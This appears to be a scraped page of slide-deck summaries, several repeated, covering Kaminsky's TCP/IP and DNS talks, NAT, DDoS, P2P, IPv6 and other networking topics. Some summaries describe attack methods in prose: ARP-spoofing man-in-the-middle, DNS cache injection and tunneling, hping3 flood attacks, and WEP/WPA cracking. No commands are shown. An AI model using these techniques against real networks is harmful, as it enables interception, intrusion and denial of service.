This document discusses various techniques for manipulating TCP/IP packets to circumvent network restrictions or achieve unusual network effects. It proposes methods for instant port scanning, multicast-like transmission over unicast networks, sharing a public IP address among multiple private hosts, and establishing connections between hosts both behind NATs. The techniques rely on creatively exploiting redundancy and flexibility in the TCP/IP protocol stack.
This document discusses vulnerabilities in the design of the Domain Name System (DNS) and how those vulnerabilities can be exploited. Specifically, it describes how DNS caches, proxies, and routes can be used to map DNS servers and inject content into caches. It also summarizes methods for tunneling arbitrary content through DNS using techniques like modifying Time-To-Live values and encoding data in domain names or record types. Finally, it discusses some approaches for suppressing DNS tunnels, such as flagging unusually large or formatted traffic.
Using techniques like ARP spoofing and NAT, it is possible to acquire an IP address and internet access on a network without a DHCP server. By intercepting traffic between an existing node and gateway, one can insert themselves as the "man in the middle" and route traffic through a NAT configuration using the hijacked node's IP address. This allows acquiring internet access without a free IP address by multiplexing sessions through the NAT. Scanrand port scanning observations can also reveal network topology details like firewall locations through analysis of TTL values.
This document discusses Dan Kaminsky's presentation on black ops of TCP/IP. It begins with an introduction of Kaminsky and what topics he plans to cover, including MD5 hashes, IP fragmentation, firewall/IPS fingerprinting, DNS poisoning, and scanning the internet. It then demonstrates how two webpages with different content can have the same MD5 hash due to collisions. It discusses using IP fragmentation and timing attacks to evade intrusion detection systems. It also describes techniques for fingerprinting firewalls and intrusion prevention systems based on their behavior in response to invalid traffic. Finally, it cautions against automatic shunning of IP addresses by security devices to avoid accidentally blocking critical infrastructure like root DNS servers.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
MD5 hashes are no longer secure due to the ability to create colliding files that have the same MD5 hash but different content and behavior. This allows an attacker to substitute a harmless file with a malicious one that cannot be detected by the MD5 hash. While auditing and other defenses make exploitation difficult, the failure of MD5 to detect differences means it cannot reliably verify file integrity and properties like executable behavior are preserved. The full attack details have not been released but are more powerful than just appending data, allowing arbitrary manipulation of file content while preserving the MD5 hash.
This document discusses various techniques for manipulating TCP/IP packets to circumvent network restrictions or achieve otherwise impossible network feats. It proposes methods for instant port scanning, multicast transmission without multicast support, sharing a public IP address among multiple private hosts, and establishing connections between hosts both behind NATs. The techniques rely on creatively exploiting redundancy and flexibility in the TCP/IP protocol stack.
The University of Edinburgh is undergoing a large project to reprocure its campus networking infrastructure. The existing network, which has grown organically over many years, contains equipment that is up to 20 years old and no longer meets the university's needs. After an internal review in 2014 recommended a new network be procured, the university embarked on a multi-stage competitive dialogue procurement process that is still ongoing. The process involves pre-market engagement, shortlisting bidders, and multiple rounds of dialogue and evaluation to refine solutions before selecting a final vendor. The procurement has proven to be a large undertaking but may result in a network solution tailored to the university's unique requirements.
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue from kernel space to user space all your incoming and outgoing network connections? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like dns tunneling connections or to fool some well known network tools. This will be showed in Linux-powered devices. It will be explained too some remote OS fingerprinting techniques, both active and passive, implemented in tools like nmap, p0f, or vendor appliances, and a how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
This document discusses vulnerabilities in the design of the Domain Name System (DNS) and how those vulnerabilities can be exploited. Specifically, it describes how DNS caches, proxies, and routes can be used to map DNS servers and inject content into caches. It also summarizes methods for tunneling arbitrary content through DNS using techniques like modifying Time-To-Live values and encoding data in domain names or record types. Finally, it discusses some approaches for suppressing DNS tunnels, such as flagging unusually large or formatted traffic.
Using techniques like ARP spoofing and NAT, it is possible to acquire an IP address and internet access on a network without a DHCP server. By intercepting traffic between an existing node and gateway, one can insert themselves as the "man in the middle" and route traffic through a NAT configuration using the hijacked node's IP address. This allows acquiring internet access without a free IP address by multiplexing sessions through the NAT. Scanrand port scanning observations can also reveal network topology details like firewall locations through analysis of TTL values.
This document discusses Dan Kaminsky's presentation on black ops of TCP/IP. It begins with an introduction of Kaminsky and what topics he plans to cover, including MD5 hashes, IP fragmentation, firewall/IPS fingerprinting, DNS poisoning, and scanning the internet. It then demonstrates how two webpages with different content can have the same MD5 hash due to collisions. It discusses using IP fragmentation and timing attacks to evade intrusion detection systems. It also describes techniques for fingerprinting firewalls and intrusion prevention systems based on their behavior in response to invalid traffic. Finally, it cautions against automatic shunning of IP addresses by security devices to avoid accidentally blocking critical infrastructure like root DNS servers.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
MD5 hashes are no longer secure due to the ability to create colliding files that have the same MD5 hash but different content and behavior. This allows an attacker to substitute a harmless file with a malicious one that cannot be detected by the MD5 hash. While auditing and other defenses make exploitation difficult, the failure of MD5 to detect differences means it cannot reliably verify file integrity and properties like executable behavior are preserved. The full attack details have not been released but are more powerful than just appending data, allowing arbitrary manipulation of file content while preserving the MD5 hash.
This document discusses various techniques for manipulating TCP/IP packets to circumvent network restrictions or achieve otherwise impossible network feats. It proposes methods for instant port scanning, multicast transmission without multicast support, sharing a public IP address among multiple private hosts, and establishing connections between hosts both behind NATs. The techniques rely on creatively exploiting redundancy and flexibility in the TCP/IP protocol stack.
The University of Edinburgh is undergoing a large project to reprocure its campus networking infrastructure. The existing network, which has grown organically over many years, contains equipment that is up to 20 years old and no longer meets the university's needs. After an internal review in 2014 recommended a new network be procured, the university embarked on a multi-stage competitive dialogue procurement process that is still ongoing. The process involves pre-market engagement, shortlisting bidders, and multiple rounds of dialogue and evaluation to refine solutions before selecting a final vendor. The procurement has proven to be a large undertaking but may result in a network solution tailored to the university's unique requirements.
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue from kernel space to user space all your incoming and outgoing network connections? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like dns tunneling connections or to fool some well known network tools. This will be showed in Linux-powered devices. It will be explained too some remote OS fingerprinting techniques, both active and passive, implemented in tools like nmap, p0f, or vendor appliances, and a how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
This document proposes adding Diffie-Hellman key exchange and digital signatures to the TCP three-way handshake to provide assured identity continuity for TCP connections even when network address translation (NAT) is used. It aims to prevent IP spoofing attacks by allowing endpoints to validate each other's identities during a TCP connection. The proposal outlines adding the cryptographic operations to the TCP handshake in a way that is incrementally deployable and backwards compatible without requiring any pre-existing relationship between endpoints. It also discusses some proof-of-concept implementation issues regarding using iptables and packet manipulation to verify signatures on TCP payloads.
DNS-OARC-36: Measurement of DNSSEC Validation with RSA-4096APNIC
APNIC Chief Scientist Geoff Huston presents on why using larger keys for RSA in the context of DNSSEC impairs the robustness of DNSSEC validation for the signed name at DNS-OARC 36, held online from 29 to 30 November 2021.
The document discusses how insecure home automation systems can be hacked by analyzing the communication protocols and accessing devices remotely. It uses a hypothetical example of a hacker gaining control of all devices in hotel rooms by understanding the KNX protocol used and sending commands through unsecured IP connections. Better security practices like mutual authentication for device communication are suggested to prevent such attacks.
Type of DDoS attacks with hping3 exampleHimani Singh
This document summarizes common DDoS attack types and how to execute them using hping3 or other tools. It describes application layer attacks like HTTP floods, protocol attacks like SYN floods, volumetric attacks like ICMP floods, and reflection attacks. It then provides commands to execute various TCP, UDP, ICMP floods and other DDoS attacks using hping3 by spoofing addresses, modifying flags, and targeting ports. Layer 7 attacks exploiting HTTP requests are also summarized.
This document discusses DDoS attacks and mitigation methods. It begins by defining DDoS attacks as using multiple sources to overwhelm a target's availability, unlike a DOS attack which uses a single source. Common DDoS attack types are then outlined, along with the costs and impacts of attacks for victims. The document also provides details on specific attack methods like SYN floods, reflection attacks using DNS and NTP, and recommended mitigation techniques including whitelisting, rate limiting, and fingerprinting. It concludes by emphasizing that DDoS attacks are easy to carry out and difficult to detect, while having significant negative effects on victims.
The presentation covers information about basic and advanced ddos attacks; the tools, techniques and methods to perform them and how to prevent them using the methods present in TCP/IP. Given the different network and application protocols for tcp/ip; we tried to describe where ddos attacks are made possible in the communication process . Each attack is seperately analyzed and described and defense technique is described using the same analogy. Our motto: If there is a ddos case, there was a way to defend it.
1. The document provides steps to configure Avaya Spaces Calling on an Avaya IP Office system. It outlines 14 configuration steps including enabling UC profiles in IP Office, configuring the One-X portal, retrieving API keys from Avaya Spaces, enabling apps in Spaces, and configuring WebRTC settings.
2. Additional resources are listed to support Avaya Spaces Calling and IP Office subscriptions including documentation, videos, presentations, and technical support information.
3. The document concludes by thanking the reader and reiterating Avaya's focus on providing experiences that matter.
This document provides an introduction to peer-to-peer (P2P) computer networks. It discusses how P2P networks rely on the computing power and bandwidth of participants rather than centralized servers. The document then covers several examples of P2P networks including Gnutella and Kademlia, and discusses techniques like distributed hash tables, queries, and node joining/leaving.
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...OpenDNS
The document discusses tracking infrastructure related to malware botnets through passive monitoring and active probing techniques. It provides an overview of tracking systems used to monitor the Gameover Zeus (GOZ) and newGOZ botnets. Specific case studies are described on tracking the fast flux proxy network of the Zbot botnet and predicting and identifying command and control domains generated by the domain generation algorithm (DGA) of the newGOZ botnet.
This document provides instructions for cracking wireless networks encrypted with WEP and WPA. It discusses the theoretical vulnerabilities in WEP that can be exploited to decrypt the network key. For WEP cracking, it describes how to use airodump to capture initialization vectors (IVs), aircrack to crack the key using the IVs, and aireplay to force traffic if needed. It also covers differences between WPA and WEP, capturing the handshake for WPA networks, and dictionary attacks to crack weak WPA passwords.
2017 JavaOne Deconstructing and Evolving REST SecurityDavid Blevins
The learning curve for security is severe and unforgiving. Specifications promise infinite flexibility, habitually give old concepts new names, offer endless extensions, and almost seem designed to deliberately confuse. With an eye on architecturual impact, actual HTTP messages, and aggressive distaste for fancy terminology, this session delves into OAuth 2.0 as it pertains to REST and shows how it falls into two camps: stateful and stateless. It then explores a competing Amazon-style approach called HTTP Signatures, ideal for B2B APIs. Finally, it discusses a new internet draft launched this year that combines them both into the perfect two-factor system that could provide a one-stop shop for business as well as mobile REST scenarios.
Kafka & Storm - FifthElephant 2015 by @bhaskerkode, HelpshiftBhasker Kode
The document discusses how Kafka's key distinguishing feature is its published protocol specification that defines how clients communicate with Kafka brokers. This allows different clients to integrate with Kafka by simply implementing the protocol over TCP, without relying on a specific client library. It also enables the ecosystem to develop rapidly due to wide adoption. The protocol focuses on efficiency through techniques like zero-copy transfer of message data directly from kernel space to sockets.
The document discusses various attacks that are possible against the AoE (ATA over Ethernet) storage protocol due to its lack of authentication and security features. Some key attacks mentioned include replay attacks, unauthenticated disk access by reading and writing directly to disks, creating an AoE proxy to reroute traffic, and denial of service attacks. The document warns that AoE deployments could be vulnerable if not properly segmented from untrusted networks.
The document provides an overview of how the internet works by discussing various networking concepts and components involved in connecting devices and routing traffic from local networks to external networks and servers. It explains protocols like TCP, UDP, and IP and networking devices like routers, switches, firewalls, proxies, load balancers and VPNs and how they facilitate communication and security. The document is intended to help understand error logs and troubleshoot network issues by providing context on the underlying infrastructure.
This document describes network address translation (NAT) and different NAT types. It includes a course on Cisco CCNA about NAT taught at Tehran Institute of Technology. The course covers introduction to NAT and private vs public addresses. It then describes static NAT, dynamic NAT, and port address translation. The document provides examples of configuring static and dynamic NAT on routers to allow internal hosts to access the internet using public IP addresses.
A small presentation about the concepts behind real-time multiplayer games and a glimpse on how to implement them with Godot Engine.
See working demo and source code: https://github.com/Faless/godotcon-multiplayer
This gives an overall idea about wireshark design and how to capture packets using wireshark, tcpdump and tshark. It also covers basics behind measuring network performance and tools to use such as bmon and iperf.
Each day millions of Internet requests are made to dynamically changing Cryptolocker domains. And it only takes one successful connection from a malware-infected system to the botnet controller for your files to end up encrypted and held for ransom.
So how does Cryptolocker actually work? What is the best way to block it? And what implications does this have for security methods going forward?
In this webcast, you will learn:
-What steps are involved in a Cryptolocker attack
-How Domain Generation Algorithms enable it to evade most threat detection methods
-Why leveraging our global intelligence has been effective in containing Cryptolocker
-What you can do to avoid becoming a victim
This document summarizes Dan Kaminsky's talk on the weaknesses of the X.509 public key infrastructure (PKI) system. Kaminsky argues that X.509 cannot adequately exclude unauthorized certificate authorities, delegate authority without pain, or protect against cryptographic vulnerabilities like insecure hashing functions still in use. Specifically, he notes one of Verisign's root certificates is self-signed using the insecure MD2 hashing algorithm, allowing for the potential creation of a malicious intermediate certificate using a preimage attack.
A Technical Dive into Defensive TrickeryDan Kaminsky
This document discusses various techniques for improving security and making it easier to deploy. It begins by introducing Dan Kaminsky and the goal of challenging assumptions. It then discusses how security is often hard to implement due to challenges like DDoS attacks being hard to remediate, TLS being difficult to deploy properly, and data loss prevention during attacks. The document proposes several solutions to these challenges, including Overflowd to help trace DDoS attacks, JFE to automatically provision TLS for all network services, and Ratelock to enforce access policies like rate limits in the cloud even if servers are compromised. It argues that moving enforcement to the cloud can improve security. The document concludes by noting that running code safely through sandboxing is also difficult but
This document proposes adding Diffie-Hellman key exchange and digital signatures to the TCP three-way handshake to provide assured identity continuity for TCP connections even when network address translation (NAT) is used. It aims to prevent IP spoofing attacks by allowing endpoints to validate each other's identities during a TCP connection. The proposal outlines adding the cryptographic operations to the TCP handshake in a way that is incrementally deployable and backwards compatible without requiring any pre-existing relationship between endpoints. It also discusses some proof-of-concept implementation issues regarding using iptables and packet manipulation to verify signatures on TCP payloads.
DNS-OARC-36: Measurement of DNSSEC Validation with RSA-4096APNIC
APNIC Chief Scientist Geoff Huston presents on why using larger keys for RSA in the context of DNSSEC impairs the robustness of DNSSEC validation for the signed name at DNS-OARC 36, held online from 29 to 30 November 2021.
The document discusses how insecure home automation systems can be hacked by analyzing the communication protocols and accessing devices remotely. It uses a hypothetical example of a hacker gaining control of all devices in hotel rooms by understanding the KNX protocol used and sending commands through unsecured IP connections. Better security practices like mutual authentication for device communication are suggested to prevent such attacks.
Type of DDoS attacks with hping3 exampleHimani Singh
This document summarizes common DDoS attack types and how to execute them using hping3 or other tools. It describes application layer attacks like HTTP floods, protocol attacks like SYN floods, volumetric attacks like ICMP floods, and reflection attacks. It then provides commands to execute various TCP, UDP, ICMP floods and other DDoS attacks using hping3 by spoofing addresses, modifying flags, and targeting ports. Layer 7 attacks exploiting HTTP requests are also summarized.
This document discusses DDoS attacks and mitigation methods. It begins by defining DDoS attacks as using multiple sources to overwhelm a target's availability, unlike a DOS attack which uses a single source. Common DDoS attack types are then outlined, along with the costs and impacts of attacks for victims. The document also provides details on specific attack methods like SYN floods, reflection attacks using DNS and NTP, and recommended mitigation techniques including whitelisting, rate limiting, and fingerprinting. It concludes by emphasizing that DDoS attacks are easy to carry out and difficult to detect, while having significant negative effects on victims.
The presentation covers information about basic and advanced ddos attacks; the tools, techniques and methods to perform them and how to prevent them using the methods present in TCP/IP. Given the different network and application protocols for tcp/ip; we tried to describe where ddos attacks are made possible in the communication process . Each attack is seperately analyzed and described and defense technique is described using the same analogy. Our motto: If there is a ddos case, there was a way to defend it.
1. The document provides steps to configure Avaya Spaces Calling on an Avaya IP Office system. It outlines 14 configuration steps including enabling UC profiles in IP Office, configuring the One-X portal, retrieving API keys from Avaya Spaces, enabling apps in Spaces, and configuring WebRTC settings.
2. Additional resources are listed to support Avaya Spaces Calling and IP Office subscriptions including documentation, videos, presentations, and technical support information.
3. The document concludes by thanking the reader and reiterating Avaya's focus on providing experiences that matter.
This document provides an introduction to peer-to-peer (P2P) computer networks. It discusses how P2P networks rely on the computing power and bandwidth of participants rather than centralized servers. The document then covers several examples of P2P networks including Gnutella and Kademlia, and discusses techniques like distributed hash tables, queries, and node joining/leaving.
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...OpenDNS
The document discusses tracking infrastructure related to malware botnets through passive monitoring and active probing techniques. It provides an overview of tracking systems used to monitor the Gameover Zeus (GOZ) and newGOZ botnets. Specific case studies are described on tracking the fast flux proxy network of the Zbot botnet and predicting and identifying command and control domains generated by the domain generation algorithm (DGA) of the newGOZ botnet.
This document provides instructions for cracking wireless networks encrypted with WEP and WPA. It discusses the theoretical vulnerabilities in WEP that can be exploited to decrypt the network key. For WEP cracking, it describes how to use airodump to capture initialization vectors (IVs), aircrack to crack the key using the IVs, and aireplay to force traffic if needed. It also covers differences between WPA and WEP, capturing the handshake for WPA networks, and dictionary attacks to crack weak WPA passwords.
2017 JavaOne Deconstructing and Evolving REST SecurityDavid Blevins
The learning curve for security is severe and unforgiving. Specifications promise infinite flexibility, habitually give old concepts new names, offer endless extensions, and almost seem designed to deliberately confuse. With an eye on architecturual impact, actual HTTP messages, and aggressive distaste for fancy terminology, this session delves into OAuth 2.0 as it pertains to REST and shows how it falls into two camps: stateful and stateless. It then explores a competing Amazon-style approach called HTTP Signatures, ideal for B2B APIs. Finally, it discusses a new internet draft launched this year that combines them both into the perfect two-factor system that could provide a one-stop shop for business as well as mobile REST scenarios.
Kafka & Storm - FifthElephant 2015 by @bhaskerkode, HelpshiftBhasker Kode
The document discusses how Kafka's key distinguishing feature is its published protocol specification that defines how clients communicate with Kafka brokers. This allows different clients to integrate with Kafka by simply implementing the protocol over TCP, without relying on a specific client library. It also enables the ecosystem to develop rapidly due to wide adoption. The protocol focuses on efficiency through techniques like zero-copy transfer of message data directly from kernel space to sockets.
The document discusses various attacks that are possible against the AoE (ATA over Ethernet) storage protocol due to its lack of authentication and security features. Some key attacks mentioned include replay attacks, unauthenticated disk access by reading and writing directly to disks, creating an AoE proxy to reroute traffic, and denial of service attacks. The document warns that AoE deployments could be vulnerable if not properly segmented from untrusted networks.
The document provides an overview of how the internet works by discussing various networking concepts and components involved in connecting devices and routing traffic from local networks to external networks and servers. It explains protocols like TCP, UDP, and IP and networking devices like routers, switches, firewalls, proxies, load balancers and VPNs and how they facilitate communication and security. The document is intended to help understand error logs and troubleshoot network issues by providing context on the underlying infrastructure.
This document describes network address translation (NAT) and different NAT types. It includes a course on Cisco CCNA about NAT taught at Tehran Institute of Technology. The course covers introduction to NAT and private vs public addresses. It then describes static NAT, dynamic NAT, and port address translation. The document provides examples of configuring static and dynamic NAT on routers to allow internal hosts to access the internet using public IP addresses.
A small presentation about the concepts behind real-time multiplayer games and a glimpse on how to implement them with Godot Engine.
See working demo and source code: https://github.com/Faless/godotcon-multiplayer
This gives an overall idea about wireshark design and how to capture packets using wireshark, tcpdump and tshark. It also covers basics behind measuring network performance and tools to use such as bmon and iperf.
Each day millions of Internet requests are made to dynamically changing Cryptolocker domains. And it only takes one successful connection from a malware-infected system to the botnet controller for your files to end up encrypted and held for ransom.
So how does Cryptolocker actually work? What is the best way to block it? And what implications does this have for security methods going forward?
In this webcast, you will learn:
-What steps are involved in a Cryptolocker attack
-How Domain Generation Algorithms enable it to evade most threat detection methods
-Why leveraging our global intelligence has been effective in containing Cryptolocker
-What you can do to avoid becoming a victim
This document summarizes Dan Kaminsky's talk on the weaknesses of the X.509 public key infrastructure (PKI) system. Kaminsky argues that X.509 cannot adequately exclude unauthorized certificate authorities, delegate authority without pain, or protect against cryptographic vulnerabilities like insecure hashing functions still in use. Specifically, he notes one of Verisign's root certificates is self-signed using the insecure MD2 hashing algorithm, allowing for the potential creation of a malicious intermediate certificate using a preimage attack.
A Technical Dive into Defensive TrickeryDan Kaminsky
This document discusses various techniques for improving security and making it easier to deploy. It begins by introducing Dan Kaminsky and the goal of challenging assumptions. It then discusses how security is often hard to implement due to challenges like DDoS attacks being hard to remediate, TLS being difficult to deploy properly, and data loss prevention during attacks. The document proposes several solutions to these challenges, including Overflowd to help trace DDoS attacks, JFE to automatically provision TLS for all network services, and Ratelock to enforce access policies like rate limits in the cloud even if servers are compromised. It argues that moving enforcement to the cloud can improve security. The document concludes by noting that running code safely through sandboxing is also difficult but
This document discusses making security easier and more practical. It argues that security needs to move beyond just being possible to actually being practical. It highlights several challenges, including that human factors are important but often overlooked. It proposes some solutions like making encryption and secure protocols the default instead of optional, and using cloud infrastructure to improve isolation and make compromises more survivable. The overall message is that the security community needs to come together to actually fix issues and make real improvements instead of just discussing theoretical possibilities.
This document discusses improving security by addressing issues with random number generation and timing attacks. It proposes using a random delay at the network interface level to obscure timing signals and prevent timing attacks. It also suggests revisiting an old technique called TrueRand that uses differences between a CPU's clock and other clocks/timers as a source of entropy for random number generation. The document advocates a pragmatic approach of deploying imperfect but effective defenses rather than insisting on perfection.
The document discusses research on chickens and their behavior. It explores various studies on chicken chickens and chickens chickens. It also lists several key sources that have looked at chickens chickens chickens and chickens chickens chickens chickens.
The document summarizes Dan Kaminsky's planned talks and demonstrations at Black Hat 2006. Some key points include:
- Enforcing network neutrality through detecting non-neutral networks using techniques like active network probing and analyzing TCP bandwidth.
- Findings from scanning over 2.4 million SSL servers, including many servers responding on port 443 without SSL enabled and variability in certificates served from the same IP.
- Demonstrating ways to securely login to online applications from an insecure home page using iframes to initialize SSL.
This document summarizes Dan Kaminsky's talk on reviewing web security and design. The talk covered three main points:
1. Bugs in the DNS system and same origin policy allow an attacker to bypass firewalls and access internal networks by manipulating domain name resolutions. This is known as DNS rebinding.
2. The attacker can use DNS rebinding to direct a browser to load content from both external and internal IP addresses, treating them as the same origin. This allows scripting cross-origin requests to internal resources.
3. Kaminsky demonstrated how an attacker could implement a proxy and tunneling system to provide arbitrary TCP/IP access to internal networks using only a compromised browser. The talk warned that this
This document summarizes a talk about DNS injection by internet service providers (ISPs) showing ads for typosquatted domains. The speaker demonstrates how a malicious subdomain injected by an ISP could steal cookies, spoof any website, and even inject content into the parent domain via script. Though the immediate risk was fixed, the speaker argues that ISP interception undermines web security by allowing arbitrary content injection and bypass of encryption. Legal restrictions are needed to establish that ISPs cannot alter or inject traffic.
The document discusses securing web applications. It argues that traditional approaches like blaming developers or banning third-party cookies are not effective solutions. Adding random tokens manually to URLs is difficult for developers. Using the referer header is unreliable due to inconsistencies across browsers and plugins. The origin header has similar problems. The document proposes an "interpreter suicide" approach where JavaScript detects cross-site navigation and prevents further execution to block attacks. This provides a client-side way to enforce session context without requiring manual token management.
This document discusses using context free grammars and XML to represent and manipulate symbols from data in order to generate fuzzed or corrupted inputs. It begins by introducing the concept of using the Sequitur algorithm to extract a hierarchical context free grammar from input data. This extracted grammar represents the patterns and symbols in the data. The document then discusses representing this grammar as XML for easier analysis and modification. It proposes using the symbol structure to guide a fuzzing technique called the CFG9000, which corrupts input data by shuffling, repeating, dropping or uniformly corrupting symbols. Examples of fuzzed output are shown for code and an XML document from Wireshark. The goal is to fuzz at the symbolic level rather than just corrup
DNS is critical infrastructure that everything on the internet relies on, but it is inherently insecure. A significant vulnerability was found in 2008 that allowed cache poisoning attacks. While patching efforts were largely successful, some servers remain unpatched and attacks have been detected in the wild. The vulnerability illustrates how DNS insecurity can undermine higher-level security systems. DNS is difficult to secure due to its need to scale across organizational boundaries, but securing it through technologies like DNSSEC could help address lingering risks.
This document summarizes Dan Kaminsky's 2008 talk at Black Hat about a vulnerability he discovered in the Domain Name System (DNS) that allowed attackers to spoof DNS responses. The vulnerability, known as DNS cache poisoning, could allow attackers to redirect traffic to malicious websites by guessing the random transaction ID associated with DNS queries. Kaminsky worked with DNS developers and organizations to coordinate a massive patching effort that updated DNS servers for over 120 million users within a few weeks. His talk analyzed the impact of the patching and discussed the technical details of how the vulnerability worked.
Yet Another Dan Kaminsky Talk (Black Ops 2014)Dan Kaminsky
The document is a transcript of a talk by Dan Kaminsky about various cybersecurity topics. Some key points:
- Hard drives are essentially their own computers with direct access to system memory, so malware on a hard drive can be highly persistent.
- Random number generators are often insecure by default due to lack of entropy. This leads to issues like easily crackable passwords.
- A new library called Liburandy aims to make random numbers secure by default by hijacking standard functions and backing them with cryptographically secure sources of randomness.
- Humans are better at remembering stories than random bits, so representing passwords as memorable stories could improve security and usability.
This document provides instructions for using OpenSSH to securely connect to remote systems and transfer files. It describes how to generate and use SSH keys for passwordless authentication, set up port forwarding to access systems through firewalls, use SSH for file transfers like SCP and rsync, and route SSH traffic through proxy servers or bastion hosts.
Bitcoin has some promising technical aspects but faces significant scalability issues that threaten its core properties over time. While it currently works as a decentralized system, the need to process vast amounts of data means nodes will consolidate into "supernodes" that effectively function like centralized banks. This transition would compromise Bitcoin's anonymity and censorship-resistance as identities become linked and certain transactions could be blocked. Overall Bitcoin shows innovation but may not retain its present security model if it aims to seriously compete with mainstream payment networks in transaction volume.
Simplified Networking and Troubleshooting for K-12 Teacherswebhostingguy
The document provides an overview of networking concepts and troubleshooting tips for K-12 teachers. It discusses common network topologies including star and backbone networks. It also describes network components like hubs, switches, routers and servers. Basic networking concepts such as the OSI model, TCP/IP, IP addressing, subnets, and DNS are explained. Finally, the document provides steps to troubleshoot common issues like no internet access, email problems, printing issues, and joining a domain.
This document discusses various network attacks such as sniffing, ARP spoofing, replay attacks, and man-in-the-middle attacks. It provides an overview of how these attacks work, such as how ARP spoofing can allow an attacker to intercept network traffic in a switched network and how replaying captured packets can trigger certain responses. It also recommends tools like tcpdump and Wireshark for sniffing networks and introduces defenses like monitoring and encryption.
The document summarizes the history and development of Ethernet and TCP/IP networking protocols. It describes how ARPANET originally used packet switching in the 1960s, the development of TCP and IP in the 1970s, and how Ethernet was implemented as a standard for local area networks. It also provides an overview of how IP, TCP and common applications like HTTP operate and interconnect across network layers.
This document provides an overview of IPv6 and how it addresses limitations in IPv4. IPv6 features a 128-bit address size allowing for more addresses compared to IPv4's 32-bit addresses. This growth is needed as IPv4 addresses are being depleted. IPv6 also supports mobility, security features like IPsec, and multicast and anycast addressing. While IPv4 uses Network Address Translation to work around its limited address space, IPv6 removes this need through its expanded addressing.
The document discusses internetworking and how to build an internet from the ground up. It describes how different networking technologies are interconnected through protocols like TCP/IP which allow communication across heterogeneous networks by smoothing out differences. Layered models and protocols are explained, including how packets are routed from one network to another through gateways and fragmented if needed to traverse networks with different maximum transmission units.
This document provides an overview of the TCP/IP protocol. It begins with an introduction to TCP and IP, explaining that TCP provides reliable, ordered delivery of data packets over the unreliable IP network layer. It then discusses key TCP concepts like the three-way handshake for connection establishment, ACK packets for reliability, and the sliding window mechanism for efficient data transfer through pipelining of packets. The document is intended to explain the core logic and functionality of the TCP protocol at a high level.
This document provides a summary of key topics in network security including IP addressing, IP spoofing, fragmentation, ICMP messages, and ways these can be abused or pose risks. Specific vulnerabilities discussed include ping flooding using spoofed source addresses for amplification attacks, overlapping IP fragments that can crash systems, and abusing ICMP unreachable messages to poison routing tables or disrupt connectivity. Safe practices like egress filtering and carefully handling fragmented packets are recommended.
The document discusses TCP/IP basics and networking concepts. It provides an overview of the OSI model and describes the layers from physical to application. It then focuses on the lower layers including Ethernet, IP addressing, ARP, and introduces TCP and UDP at the transport layer.
TCP/IP is a protocol suite that includes IP, TCP, and UDP. IP provides connectionless and unreliable delivery of datagrams between hosts. TCP provides reliable, connection-oriented byte stream delivery between processes using ports. UDP offers minimal datagram delivery between processes using ports in an unreliable manner. The choice between TCP and UDP depends on the application's requirements for reliability and overhead.
The document discusses networking basics, including common network terminology and protocols. It explains that networks use multiple layers of protocols, with applications like HTTP and FTP relying on lower level protocols like TCP and IP for transport and routing. It also describes key networking concepts such as IP addresses, DNS, subnets, private networks, and network devices like routers and servers.
This document provides a tutorial on network programming with Python. It begins with an overview of key network concepts like MAC addresses, IP addresses, ports, connectionless vs connection-oriented communication, and clients and servers. It then analyzes a sample client/server program written in Python to demonstrate how they communicate. It discusses the role of the operating system in managing connections and distinguishing between multiple simultaneous connections. Finally, it covers additional topics like sending lines of text over TCP connections and dealing with asynchronous network inputs.
This document provides an overview of Ethernet networking including:
1. Ethernet uses layers 1 and 2 of the OSI model and the Network Access layer of the TCP/IP model. It evolved from early LAN technologies and uses frames, MAC addressing, and CSMA/CD.
2. Switches avoid collisions by forwarding frames only to destination ports, improving performance over hubs. Higher bandwidth standards like Fast Ethernet and Gigabit Ethernet require full-duplex links without collisions.
3. Ethernet addressing uses MAC addresses to identify devices locally and IP addresses to route between networks. ARP resolves IP addresses to MAC addresses to allow communication between hosts.
This document provides information on networking topics in Linux including:
- How to connect to Linux systems using SSH and things that can be done from the Linux command line interface
- IP addressing and subnet masking
- Setting up networks and creating permanent network configuration files
- Network troubleshooting tools like traceroute, nmap, netstat
- Reasons why network software may not work like firewalls blocking ports or network speed issues
- An overview of VPNs versus proxy servers and how each works
VLANs logically segment networks to limit broadcast domains and improve performance. VLANs use tagging to associate packets with VLAN IDs and allow machines on different physical LAN segments to communicate logically as if on the same segment. Port security features on switches can limit access to ports by blocking unauthorized MAC addresses and alerting network managers of potential security issues.
This document summarizes the physical and data link layers that TCP/IP relies on. It describes how TCP/IP services are controlled by daemons like inetd. It then discusses the physical layer and different networking components like repeaters, bridges, switches, and routers. The rest of the document focuses on the data link layer, covering topics like data addressing, flow control, data integrity, frames, and common protocols like Ethernet, Token Ring, Serial Protocols, SLIP, and PPP.
The document discusses Ethernet and multiple access protocols. It covers:
- Ethernet uses CSMA/CD as its multiple access protocol to prevent collisions on shared channels.
- Bridges connect multiple Ethernet networks and use the spanning tree protocol to prevent loops while maintaining connectivity.
- Switches operate similarly to bridges but each port connects to a single device, allowing for full-duplex links.
